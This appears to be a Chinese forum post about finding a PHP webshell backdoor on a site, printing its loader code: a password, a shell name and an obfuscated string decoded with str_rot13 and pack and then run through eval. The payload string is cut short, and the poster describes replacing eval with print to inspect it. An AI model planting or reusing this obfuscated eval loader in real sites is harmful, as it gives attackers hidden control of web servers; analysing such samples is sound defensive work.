|
PHP 恶意程序 发现后门(Webshell)文件
Web 恶意程序。
大体看一下这个恶意程序的长相,大体代码如下:
- <?php
- $password='1';
- $shellname='BY:DanDan';
- $myurl='http://www.baidu.com';
- error_reporting(E_ERROR | E_PARSE);@set_time_limit(0);
- ob_start();
- header("content-Type: text/html; charset=gb2312");
- $str = "6s625s737461727428293o0q0n64";
- $dir = pack("H*",str_rot13($str));
- eval($dir);
- ?>
复制代码 $str后面内容非常长的一串字符串,已经经过转译过了的代码中的 $str 变量的值没有给全,测试了一下,在运行时我把最后一行的 eval 修改为 print,在命令行下运行
还有没大家发现的恶意程序 的样式, 可以分享下,,,,,,,,
|
|